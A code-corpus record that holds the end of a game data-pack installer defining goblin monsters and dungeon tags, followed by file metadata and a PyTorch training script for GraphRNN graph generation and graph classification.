chestpiece = db.Armor.objects.get(name = "Acrobat's Shirt").to_dbref()
boots = db.Armor.objects.get(name = "Acrobat's Shoes").to_dbref()
n_char = db.character(name = "Goblin Scout",
willpower = 1,
vitality = 1,
agility = 2,
strength = 1,
karma = 1,
current_health = 10,
current_sanity = 10,
armor_equiped = [helmet,chestpiece,boots],
weapons_equiped = [weapon_slash,null_obj,null_obj,null_obj],
instance_stack = []
)
db.MonsterEntry(name = n_char.name, character_stats=n_char).save()
helmet = db.Armor.objects.get(name = "Brute's Helmet").to_dbref()
chestpiece = db.Armor.objects.get(name = "Brute's Armour").to_dbref()
boots = db.Armor.objects.get(name = "Brute's Boots").to_dbref()
n_char = db.character(name = "Goblin Brute",
willpower = 1,
vitality = 1,
agility = 1,
strength = 2,
karma = 1,
current_health = 10,
current_sanity = 10,
armor_equiped = [helmet,chestpiece,boots],
weapons_equiped = [weapon_slash,null_obj,null_obj,null_obj],
instance_stack = []
)
db.MonsterEntry(name = n_char.name, character_stats=n_char).save()
print("Basic Monsters Pack Installed Successfully")
def basic_dungeon():
db.Tags(
name = "Decorators",
collection = ["barrel", "cupboard", "waste", "pot", "corpses", "torches",
"bones","pit","mold","graffiti","cage","kennels","debris"]
).save()
db.Tags(
name = "Deadends",
collection = ["wall", "bottomless pit", "boulder" , "wooden obstacle",
"barricade"]
).save()
db.Tags(
name = "Pathways",
collection = ["tunnel","slope","stairs","stream","waterfall","bridge",
"shipwreck", "door", "doorway", "curtain", "corridor"]
).save()
db.Tags(
name = "Symbols",
collection = ["circle", "square", "triangle", "stickman", "eye", "sun",
"moon", "hexagon", "skull", "oval", "leaf", "bear", "wolf", "eagle",
"fish", "sword", "bow", "flame", "star" , "deer", "arrow", "spiral",
"zero", "one", "two","three","four","five","six","seven","eight","nine"]
).save()
db.DungeonEntry(
name = "Goblin Lair",
max_monsters = 10,
average_number_of_rooms = 15,
monsters_list = ["Goblin Rook", "Goblin Scout", "Goblin Brute"],
id_prefix = "GL",
descriptor_tags =["barrel", "cupboard", "waste", "pot", "corpses", "torches",
"bones","pit","mold","graffiti","cage","kennels","debris"],
deadends_tags = ["wall", "bottomless pit", "boulder" , "wooden obstacle",
"barricade"],
pathways_tags = ["tunnel","slope","stairs","stream","waterfall","bridge",
"shipwreck", "door", "doorway", "curtain", "corridor"]
).save()
print("Basic Dungeon Pack Installed Successfully")
def install_pack():
basic_weapons()
basic_armor()
basic_monsters()
basic_dungeon()
db.PackageNames(name = "basic").save() | 38.339161 | 86 | 0.534519 | 1,215 | 10,965 | 4.583539 | 0.147325 | 0.060334 | 0.09912 | 0.067157 | 0.810738 | 0.753995 | 0.740707 | 0.70264 | 0.66511 | 0.64859 | 0 | 0.024343 | 0.340629 | 10,965 | 286 | 87 | 38.339161 | 0.74592 | 0.005746 | 0 | 0.608871 | 1 | 0 | 0.116891 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020161 | false | 0 | 0.008065 | 0 | 0.028226 | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d369066d7963085eee27589961fc935fd4457dc | 52,277 | py | Python | train.py | jonathangomesselman/graph-generation | 72a8be30d54a414fcca9ea0fad1a62e38b85ee2f | [
"MIT"
] | 1 | 2021-12-11T16:03:06.000Z | 2021-12-11T16:03:06.000Z | train.py | jonathangomesselman/graph-generation | 72a8be30d54a414fcca9ea0fad1a62e38b85ee2f | [
"MIT"
] | null | null | null | train.py | jonathangomesselman/graph-generation | 72a8be30d54a414fcca9ea0fad1a62e38b85ee2f | [
"MIT"
] | 1 | 2021-12-11T16:03:09.000Z | 2021-12-11T16:03:09.000Z | import networkx as nx
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Variable
import matplotlib.pyplot as plt
import torch.nn.functional as F
from torch import optim
from torch.optim.lr_scheduler import MultiStepLR, CosineAnnealingLR
from sklearn.decomposition import PCA
import logging
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence
from time import gmtime, strftime
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.metrics import average_precision_score
from random import shuffle
import pickle
from tensorboard_logger import configure, log_value
import scipy.misc
import time as tm
import seaborn as sns
from utils import *
from model import *
from data import *
from args import Args
import create_graphs
# Kinda hacky, but allows running on non-CUDA machines locally.
# device is used throughout the training loops below, so it must actually be defined.
args_temp = Args()
device = torch.device('cuda:{}'.format(args_temp.cuda) if torch.cuda.is_available() else 'cpu')
def train_rnn_graph_class_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
"""
Train the GraphRNN model for the task of graph classification
"""
classification_loss = nn.CrossEntropyLoss()
rnn.train()
output.train()
loss_sum = 0
total_correct = 0
total_predicted = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
        # Note: data['feat'] is None when node features are disabled!
        features_unsorted = data['feat'].float() if args.node_features else None
        classification_labels_unsorted = data['label'].long()
        y_len_max = max(y_len_unsorted)
        x_unsorted = x_unsorted[:, 0:y_len_max, :]
        # y_unsorted = [batch size, max number of nodes, max previous]
        y_unsorted = y_unsorted[:, 0:y_len_max, :]
        if args.node_features:
            features_unsorted = features_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input graphs!
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
classification_labels = torch.index_select(classification_labels_unsorted, 0, sort_index)
# Sort the node features
if args.node_features:
features = torch.index_select(features_unsorted,0,sort_index)
# input, output for output rnn module
# a smart use of pytorch builtin function: pack variable--b1_l1,b2_l1,...,b1_l2,b2_l2,...
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1)
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
classification_labels = Variable(classification_labels).to(device)
if args.node_features:
features = Variable(features).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
# Note that classification holds the predictions
# for the graph classification task!
h, classification = rnn(x, features_raw=features,pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = torch.sigmoid(y_pred)  # F.sigmoid is deprecated
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
classifier_loss = classification_loss(classification, classification_labels)
# Combine the generative (binary cross-entropy) and classification losses!
generative_loss = binary_cross_entropy_weight(y_pred, output_y)
loss = args.classification_weight * classifier_loss + args.gen_weight * generative_loss
# Note: in a semi-supervised setting, the classification loss could be
# restricted to a labeled subset of the training graphs, while every
# graph still contributes to the generative loss. That would give the
# generative model more data to train on.
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
loss_sum += loss.item()
# Accuracy for now; an F1 score would likely be a better metric here
total_correct += num_correct(classification, classification_labels)
total_predicted += classification_labels.shape[0]
# Get avg. batch loss
avg_loss = loss_sum / (batch_idx + 1)
accuracy = float(total_correct) / total_predicted
if epoch % args.epochs_log==0: # log epoch statistics every epochs_log epochs
print('Epoch: {}/{}, train loss: {:.6f}, train accuracy: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,avg_loss, accuracy, args.num_layers, args.hidden_size_rnn))
return avg_loss, accuracy
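# The output_y_len construction above (bincount plus suffix sums) is compact;
# the helper below re-derives it in isolation as a sketch (hypothetical name,
# not part of the training code) so the trick can be sanity-checked.

```python
import numpy as np

def edge_rnn_lengths(y_len, max_prev_node):
    # For a length-sorted batch, the packed-and-reversed edge sequences have
    # lengths min(i, max_prev_node), where i counts down from the longest
    # node sequence and each i appears once per graph with y_len >= i.
    out = []
    counts = np.bincount(np.array(y_len))
    for i in range(len(counts) - 1, 0, -1):
        count_temp = int(np.sum(counts[i:]))  # graphs with y_len >= i
        out.extend([min(i, max_prev_node)] * count_temp)
    return out
```

# One entry per packed row: for y_len=[3,2] there are sum(y_len)=5 rows.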
def test_rnn_graph_class_epoch(epoch, args, rnn, output, data_loader, trails=50):
"""
Test the graph-level rnn's ability to generate meaningful
embeddings for graph classifciation. While we use the whole
graphRNN for training (also including the generative modeling
loss), here we technically only need the output from the
graph level RNN.
"""
classification_loss = nn.CrossEntropyLoss()
rnn.eval()
output.eval()
loss_sum = 0
# Average the accuracy over `trails` passes, each seeing a different
# random permutation of the graphs, to reduce sensitivity to node
# ordering (the model is not permutation invariant).
running_accuracy = 0
for i in range(trails):
trail_correct = 0
trail_predicted = 0
trail_loss = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_len_unsorted = data['len']
classification_labels_unsorted = data['label'].long()
features_unsorted = data['feat'].float()
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
features_unsorted = features_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
classification_labels = torch.index_select(classification_labels_unsorted, 0, sort_index)
# Sort the node features (left as None when node features are disabled)
features = None
if args.node_features:
features = torch.index_select(features_unsorted,0,sort_index)
# pack into variable
x = Variable(x).to(device)
classification_labels = Variable(classification_labels).to(device)
if args.node_features:
features = Variable(features).to(device)
# Classification holds the predictions for the graph classification task!
h, classification = rnn(x, features_raw=features, pack=True, input_len=y_len)
classifier_loss = classification_loss(classification, classification_labels)
trail_loss += classifier_loss.item()
trail_correct += num_correct(classification, classification_labels)
trail_predicted += classification_labels.shape[0]
# Keep running accuracy metrics
trail_acc = float(trail_correct) / trail_predicted
running_accuracy += trail_acc
trail_loss = trail_loss / (batch_idx + 1)
loss_sum += trail_loss
avg_loss = loss_sum / float(trails)
avg_accuracy = float(running_accuracy) / trails
return avg_loss, avg_accuracy
def train_graph_class(args, dataset_train, dataset_test, rnn, output):
# check if load existing model
if args.load:
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
args.lr = 0.00001
epoch = args.load_epoch
print('model loaded!, lr: {}'.format(args.lr))
else:
epoch = 1
# initialize optimizer
optimizer_rnn = optim.Adam(list(rnn.parameters()), lr=args.lr)
optimizer_output = optim.Adam(list(output.parameters()), lr=args.lr)
# Choice of learning-rate scheduler (worth tuning)
if args.scheduler == 'step':
scheduler_rnn = MultiStepLR(optimizer_rnn, milestones=args.milestones, gamma=args.lr_rate)
scheduler_output = MultiStepLR(optimizer_output, milestones=args.milestones, gamma=args.lr_rate)
elif args.scheduler == 'cos':
scheduler_rnn = CosineAnnealingLR(optimizer_rnn, T_max=args.epochs)
scheduler_output = CosineAnnealingLR(optimizer_output, T_max=args.epochs)
else:
raise ValueError('unknown scheduler: {}'.format(args.scheduler))
# start main loop
time_all = np.zeros(args.epochs)
while epoch<=args.epochs:
time_start = tm.time()
train_rnn_graph_class_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
time_end = tm.time()
time_all[epoch - 1] = time_end - time_start
# test the models performance on graph classification!
if epoch % args.epochs_test == 0 and epoch>=args.epochs_test_start:
avg_test_loss, avg_test_acc = test_rnn_graph_class_epoch(epoch, args, rnn, output, dataset_test)
print('Test done - Avg Test loss: {:.5f}, Avg Test accuracy: {}'.format(avg_test_loss, avg_test_acc))
# save model checkpoint
if args.save:
if epoch % args.epochs_save == 0:
fname = args.model_save_path + args.fname + 'lstm_' + str(epoch) + '.dat'
torch.save(rnn.state_dict(), fname)
fname = args.model_save_path + args.fname + 'output_' + str(epoch) + '.dat'
torch.save(output.state_dict(), fname)
epoch += 1
np.save(args.timing_save_path+args.fname,time_all)
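# The 'step' scheduler above multiplies the learning rate by gamma at each
# milestone. A minimal sketch of the effective rate (assuming it mirrors
# torch.optim.lr_scheduler.MultiStepLR; multistep_lr is a hypothetical
# helper, not used elsewhere in this file):

```python
def multistep_lr(base_lr, milestones, gamma, epoch):
    # lr = base_lr * gamma ** (number of milestones already reached)
    passed = sum(1 for m in milestones if epoch >= m)
    return base_lr * gamma ** passed
```

# e.g. with milestones [400, 1000] and gamma 0.3, the rate drops to 30%
# of base at epoch 400 and to 9% at epoch 1000.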
# Trains the plain generative GraphRNN model for one epoch (no classification head)
def train_rnn_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
# y_unsorted = [batch size, max number of nodes, max previous]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
# input, output for the edge-level output rnn module
# a neat use of the pytorch builtin pack_padded_sequence: the packed data is ordered b1_l1, b2_l1, ..., b1_l2, b2_l2, ...
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1)
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
# print(output_y_len)
# print('len',len(output_y_len))
# print('y',y.size())
# print('output_y',output_y.size())
# if using ground truth to train
h = rnn(x, pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = torch.sigmoid(y_pred)  # F.sigmoid is deprecated
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
# use cross entropy loss
loss = binary_cross_entropy_weight(y_pred, output_y)
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs, loss.item(), args.graph_type, args.num_layers, args.hidden_size_rnn))
# logging
log_value('loss_'+args.fname, loss.item(), epoch*args.batch_ratio+batch_idx)
feature_dim = y.size(1)*y.size(2)
loss_sum += loss.item()*feature_dim
return loss_sum/(batch_idx+1)
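# pack_padded_sequence(...).data above flattens a length-sorted batch in
# time-major order (b1_l1, b2_l1, ..., b1_l2, b2_l2, ...). A numpy sketch of
# that ordering (illustrative only; not the PyTorch implementation):

```python
import numpy as np

def pack_batch_first(padded, lengths):
    # lengths must be sorted in descending order, as in the training loops.
    rows = []
    for t in range(max(lengths)):
        for b, n in enumerate(lengths):
            if t < n:  # sequence b is still active at step t
                rows.append(padded[b, t])
    return np.stack(rows)
```

# For lengths [3, 2] the 5 packed rows interleave the two sequences step by step.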
# Generates test_batch_size graphs autoregressively from the trained model
def test_rnn_epoch(epoch, args, rnn, output, test_batch_size=16):
rnn.hidden = rnn.init_hidden(test_batch_size)
rnn.eval()
output.eval()
# generate graphs
max_num_node = int(args.max_num_node)
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
h = rnn(x_step)
# output.hidden = h.permute(1,0,2)
hidden_null = Variable(torch.zeros(args.num_layers - 1, h.size(0), h.size(2))).to(device)
output.hidden = torch.cat((h.permute(1,0,2), hidden_null),
dim=0) # num_layers, batch_size, hidden_size
x_step = Variable(torch.zeros(test_batch_size,1,args.max_prev_node)).to(device)
output_x_step = Variable(torch.ones(test_batch_size,1,1)).to(device)
for j in range(min(args.max_prev_node,i+1)):
output_y_pred_step = output(output_x_step)
output_x_step = sample_sigmoid(output_y_pred_step, sample=True, sample_time=1)
x_step[:,:,j:j+1] = output_x_step
output.hidden = Variable(output.hidden.data).to(device)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
G_pred_list = []
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
return G_pred_list
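# decode_adj (defined elsewhere) turns the max_prev_node band encoding back
# into an adjacency matrix. Below is a simplified, hypothetical analogue of
# that scheme, where entry j of row i encodes an edge between node i+1 and
# node i-j; the real decode_adj may differ in details such as entry order.

```python
import numpy as np

def decode_adj_sketch(encoded):
    n = encoded.shape[0] + 1  # row i describes node i + 1
    adj = np.zeros((n, n), dtype=int)
    for i in range(1, n):
        for j in range(min(i, encoded.shape[1])):
            if encoded[i - 1, j]:
                adj[i, i - 1 - j] = 1  # symmetric, undirected graph
                adj[i - 1 - j, i] = 1
    return adj
```

# e.g. a triangle on 3 nodes is encoded as [[1, 0], [1, 1]].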
########### main train function (dispatches to the VAE / MLP / RNN variants)
def train(args, dataset_train, rnn, output):
# check if load existing model
if args.load:
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
args.lr = 0.00001
epoch = args.load_epoch
print('model loaded!, lr: {}'.format(args.lr))
else:
epoch = 1
# initialize optimizer
optimizer_rnn = optim.Adam(list(rnn.parameters()), lr=args.lr)
optimizer_output = optim.Adam(list(output.parameters()), lr=args.lr)
scheduler_rnn = MultiStepLR(optimizer_rnn, milestones=args.milestones, gamma=args.lr_rate)
scheduler_output = MultiStepLR(optimizer_output, milestones=args.milestones, gamma=args.lr_rate)
# start main loop
time_all = np.zeros(args.epochs)
while epoch<=args.epochs:
time_start = tm.time()
# train
if 'GraphRNN_VAE' in args.note:
train_vae_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
elif 'GraphRNN_MLP' in args.note:
train_mlp_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
elif 'GraphRNN_RNN' in args.note:
if args.graph_classification:
train_rnn_graph_class_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
else:
train_rnn_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
time_end = tm.time()
time_all[epoch - 1] = time_end - time_start
# test
if epoch % args.epochs_test == 0 and epoch>=args.epochs_test_start:
for sample_time in range(1,4):
G_pred = []
while len(G_pred)<args.test_total_size:
if 'GraphRNN_VAE' in args.note:
G_pred_step = test_vae_epoch(epoch, args, rnn, output, test_batch_size=args.test_batch_size,sample_time=sample_time)
elif 'GraphRNN_MLP' in args.note:
G_pred_step = test_mlp_epoch(epoch, args, rnn, output, test_batch_size=args.test_batch_size,sample_time=sample_time)
elif 'GraphRNN_RNN' in args.note:
G_pred_step = test_rnn_epoch(epoch, args, rnn, output, test_batch_size=args.test_batch_size)
G_pred.extend(G_pred_step)
# save graphs
fname = args.graph_save_path + args.fname_pred + str(epoch) +'_'+str(sample_time) + '.dat'
save_graph_list(G_pred, fname)
if 'GraphRNN_RNN' in args.note:
break
print('test done, graphs saved')
# save model checkpoint
if args.save:
if epoch % args.epochs_save == 0:
fname = args.model_save_path + args.fname + 'lstm_' + str(epoch) + '.dat'
torch.save(rnn.state_dict(), fname)
fname = args.model_save_path + args.fname + 'output_' + str(epoch) + '.dat'
torch.save(output.state_dict(), fname)
epoch += 1
np.save(args.timing_save_path+args.fname,time_all)
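# During generation (test_rnn_epoch above), sample_sigmoid draws each edge
# from its predicted probability. A minimal numpy sketch of that kind of
# Bernoulli step (an assumption about its role; the real helper, defined
# elsewhere, also supports repeated sampling via sample_time):

```python
import numpy as np

def sample_bernoulli(probs, rng):
    # One independent Bernoulli draw per predicted edge probability.
    return (rng.random(np.shape(probs)) < np.asarray(probs)).astype(np.float32)
```
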
# Given a data_loader full of graphs, runs through it once to
# calculate the NLL of every graph in the dataset
def rnn_data_nll(args, rnn, output, data_loader):
rnn.train()
output.train()
# Get the nlls for every graph in the dataset
nlls = []
avg_nlls = []
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
# input, output for the edge-level output rnn module
# a neat use of the pytorch builtin pack_padded_sequence: the packed data is ordered b1_l1, b2_l1, ..., b1_l2, b2_l2, ...
# With batch size 1 nothing changes here except that the batch dimension is removed
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1) # prepend an all-ones start token and shift the targets right by one step
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
h = rnn(x, pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = torch.sigmoid(y_pred)  # F.sigmoid is deprecated
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
# Open question: the last hidden state could potentially be reused here for graph-level prediction
loss = binary_cross_entropy_weight(y_pred, output_y)
# Because the BCELoss by default takes the mean over the
# output, we want to multiply by the dimension of the feature
# space to maintain the sum over the log probabilities for the
# component of each sequence.
# ---------------------------
# (Equivalently, BCE could be used with reduction='sum'.)
feature_dim = y_pred.size(0)*y_pred.size(1)
# Note that here y.size(0) = 1
avg_nll = loss.item()
nll = avg_nll*feature_dim/y.size(0)
# Record the NLL for this graph
nlls.append(nll)
avg_nlls.append(avg_nll)
return nlls, avg_nlls
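# The rescaling above converts a mean-reduced BCE back into a summed NLL.
# A quick numerical check of that identity, as a standalone sketch:

```python
import numpy as np

def bce_mean_and_sum(y_pred, y_true, eps=1e-12):
    # Elementwise binary cross-entropy terms; mean * num_elements == sum.
    terms = -(y_true * np.log(y_pred + eps)
              + (1 - y_true) * np.log(1 - y_pred + eps))
    return terms.mean(), terms.sum()
```
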
# This function gets the negative log-likelihoods of the data
def calc_nll(args, data_loader, rnn, output, max_iter=100, load_epoch=3000, train_dataset=None, log=10):
"""
C
"""
'''
# Set the epoch we are loading from
args.load_epoch = load_epoch
if train_dataset:
fname = args.note + '_' + train_dataset + '_' + str(args.num_layers) + '_' + str(args.hidden_size_rnn) + '_'
fname_rnn = args.model_save_path + fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + fname + 'output_' + str(args.load_epoch) + '.dat'
else:
fname_rnn = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
print (fname_rnn)
rnn.load_state_dict(torch.load(fname_rnn))
output.load_state_dict(torch.load(fname_out))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
'''
# Calculate nll over dataset max_iter times,
# to test robustness to permutations of the bfs
# ordered adjacency matrix for the same graphs.
nlls = []
avg_nlls = []
for i in range(max_iter):
nll, avg_nll = rnn_data_nll(args, rnn, output, data_loader)
# Logging info
# May want to also include std statistics
if (i + 1) % log == 0:
print ("Iteration:", i + 1)
print ("Average Nll over train data:", np.mean(avg_nll))
nlls.extend(nll)
avg_nlls.extend(avg_nll)
return nlls, avg_nlls
# Not used!
def analyze_nll(args, dataset_train, dataset_test, rnn, output,graph_validate_len,graph_test_len, max_iter = 1000, dataset=None):
"""
Given a trained model, calculate the negative log likelihoods for each data point in the
train and test set and then create a histogram to display the distribution of nlls.
"""
if dataset:
fname = args.note + '_' + dataset + '_' + str(args.num_layers) + '_' + str(args.hidden_size_rnn) + '_'
fname_rnn = args.model_save_path + fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + fname + 'output_' + str(args.load_epoch) + '.dat'
else:
fname_rnn = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname_rnn))
output.load_state_dict(torch.load(fname_out))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
